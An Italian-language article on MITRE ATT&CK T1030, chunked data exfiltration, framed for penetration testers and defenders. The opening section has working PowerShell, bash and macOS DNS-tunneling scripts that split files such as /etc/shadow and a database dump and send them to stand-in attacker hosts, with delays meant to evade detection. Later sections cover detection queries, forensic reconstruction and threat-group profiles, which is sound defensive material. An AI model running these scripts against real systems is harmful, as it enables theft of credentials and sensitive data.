Suddivisione Dati in Blocchi: Data Transfer Size Limits (T1030)

Durante un penetration test, simulare l'esfiltrazione frammentata richiede precisione chirurgica. Su Windows, il comando PowerShell diventa il vostro alleato principale:

$file = [System.IO.File]::ReadAllBytes("C:\sensitive\database.sql")
$chunkSize = 1024 * 1024  # 1MB chunks
for($i=0; $i -lt $file.Length; $i+=$chunkSize) {
    $chunk = $file[$i..([Math]::Min($i+$chunkSize-1, $file.Length-1))]
    Invoke-RestMethod -Uri "https://c2.attacker.com/upload" -Method Post -Body $chunk
    Start-Sleep -Seconds 30  # Evade rate limiting
}

L'implementazione Linux sfrutta invece la potenza di split combinata con curl per orchestrare il trasferimento:

split -b 1M /etc/shadow shadow_chunk_
for chunk in shadow_chunk_*; do
    curl -X POST -H "Content-Type: application/octet-stream" \
         --data-binary "@$chunk" https://c2.attacker.com/upload
    sleep $((RANDOM % 60 + 10))  # Random delay 10-70 seconds
done

Cobalt Strike automatizza elegantemente questo processo. Il framework spezza automaticamente i dati in chunk quando si utilizza il comando download, gestendo internamente la frammentazione per evitare detection basate su volume.

Per macOS, l'approccio richiede attenzione particolare alle peculiarità del sistema. Lo script seguente dimostra come frammentare ed esfiltrare attraverso DNS tunneling:

#!/bin/bash
dd if=/Users/target/Documents/secrets.xlsx bs=23 | while read -r chunk; do
    encoded=$(echo "$chunk" | base64 | tr -d '\n')
    nslookup "$encoded.tunnel.attacker.com"
done

Il tool Rclone offre funzionalità native di chunking particolarmente utili. La configurazione --chunker-chunk-size=1M divide automaticamente file di grandi dimensioni durante l'upload verso servizi cloud, perfetto per simulare scenari realistici di data theft attraverso canali apparentemente legittimi.

La detection efficace richiede un approccio multidimensionale che vada oltre le semplici soglie di volume. Il primo indicatore chiave è l'uniformità dei pacchetti: quando Sysmon EventCode 3 registra connessioni che trasmettono ripetutamente blocchi di dimensioni identiche (±5% di varianza), siamo di fronte a un comportamento sospetto.

Configurate le vostre regole SIEM per identificare pattern temporali regolari. Un processo legittimo raramente invia dati con intervalli così precisi come fa un malware che tenta di evadere il rate limiting. La query Splunk seguente cattura questo comportamento:

index=network sourcetype=zeek:conn 
| eval chunk_size=bytes_out 
| stats count, stdev(chunk_size) as size_variance by src_ip, dest_ip 
| where count > 20 AND size_variance < (avg(chunk_size) * 0.05)

L'analisi del traffico NetFlow rivela ulteriori anomalie. Cercate sessioni lunghe con rapporti bytes_out/bytes_in fortemente sbilanciati, specialmente quando originano da processi non tipicamente associati a trasferimenti di rete massivi.

I falsi positivi rappresentano una sfida significativa. Applicazioni di backup legittime, sincronizzazione cloud e streaming media possono generare pattern simili. La chiave sta nel contestualizzare: un browser che improvvisamente inizia a trasmettere chunk uniformi verso un dominio appena registrato merita immediata attenzione, mentre OneDrive che fa lo stesso verso microsoft.com è business as usual.

Per AWS, monitorate i VPC Flow Logs cercando istanze EC2 che stabiliscono numerose connessioni brevi verso lo stesso endpoint esterno. Il comportamento "burst and pause" è caratteristico di tool come StealBit, che può essere configurato per limitare il rate di esfiltrazione.

La ricostruzione forense di un'esfiltrazione frammentata richiede pazienza e metodo. Su Windows, il Microsoft-Windows-BITS-Client/Operational log può rivelare trasferimenti frammentati mascherati da aggiornamenti legittimi. I job BITS creati da processi inusuali sono bandiere rosse immediate.

L'analisi della timeline deve correlare eventi di rete con attività sul filesystem. Quando APT28 ha compromesso i sistemi nel 2021, gli analisti hanno ricostruito l'attacco correlando la creazione di archivi RAR divisi (visibili nel journal NTFS) con burst di traffico di rete verso IP russi.

Su Linux, auditd cattura le syscall connect e sendto con precisione millimetrica. La sequenza tipica mostra:

1. Apertura del file target (openat)
2. Lettura in blocchi uniformi (read)
3. Connessioni ripetute allo stesso endpoint (connect)
4. Trasferimento dati (sendto)

Il caso LuminousMoth del 2021 ha mostrato come gli attaccanti abbiano diviso archivi per aggirare un limite di 5MB imposto dal proxy aziendale. I forensic analyst hanno ricostruito l'intera sequenza analizzando i log del proxy in correlazione con i timestamp di creazione dei file parziali.

Per macOS, Unified Logs nel dominio com.apple.network registrano dettagli preziosi. L'Endpoint Security framework cattura eventi ES_EVENT_TYPE_NOTIFY_CONNECT che, quando correlati con l'attività di I/O su file, rivelano pattern di chunking. Un indicatore chiave è la presenza di processi che leggono file di grandi dimensioni ma generano solo piccoli flussi di rete uniformi.

La persistenza degli artefatti varia drammaticamente. Mentre i log di rete potrebbero essere sovrascritti rapidamente, tracce nel filesystem (file temporanei, journal entries) possono persistere per settimane. Durante l'analisi della campagna C0015, i ricercatori hanno recuperato frammenti di file Rclone anche 30 giorni dopo l'esfiltrazione, nascosti in directory temporanee.

APT41 rappresenta l'eccellenza nell'arte della frammentazione. Questo gruppo sino-orientale non si limita a dividere i file: implementa algoritmi di chunking dinamico che adattano le dimensioni dei blocchi in base alla latenza di rete osservata. La loro specialità sono chunk tra 384KB e 512KB, ottimizzati per passare inosservati nel normale traffico HTTPS aziendale.

Threat Group-3390 preferisce un approccio più grezzo ma efficace: archivi RAR multi-part caricati su servizi cloud legittimi. La loro firma distintiva è l'uso di password complesse per ogni parte, con le chiavi inviate attraverso canali secondari. Monitorare domini di file sharing asiatici diventa cruciale quando si tracciano le loro operazioni.

Play ransomware group ha evoluto la tecnica integrando il chunking direttamente nel loro malware. Non si limitano a rubare: frammentano i dati delle vittime per massimizzare la pressione psicologica, rilasciando gradualmente informazioni sensibili se il riscatto non viene pagato.

I pattern geografici sono illuminanti. I gruppi dell'Europa orientale tendono a preferire chunk più piccoli (sotto 1MB) con timing irregolare per evitare pattern detection. Gli attori asiatici mostrano preferenza per blocchi più grandi (1-5MB) ma con pause più lunghe tra i trasferimenti, probabilmente per accommodare la latenza transcontinentale.

L'evoluzione verso l'automazione è evidente. Tool come Carbanak e POSHSPY includono logica di chunking adattiva che monitora la risposta della rete e aggiusta dinamicamente sia la dimensione dei blocchi che gli intervalli di trasmissione. Questa capacità di "imparare" l'ambiente target rappresenta la prossima frontiera nella sofisticazione degli attacchi.

Framework MITRE ATT&CK T1030. Documentazione ufficiale gruppi APT28, APT41, Threat Group-3390, LuminousMoth, Play. Analisi campagne C0015 (Conti/Bazar 2021) e C0026 (Suspected Turla 2022). Cobalt Strike manual, Mythic framework documentation. RecordedFuture infrastructure analysis 2021.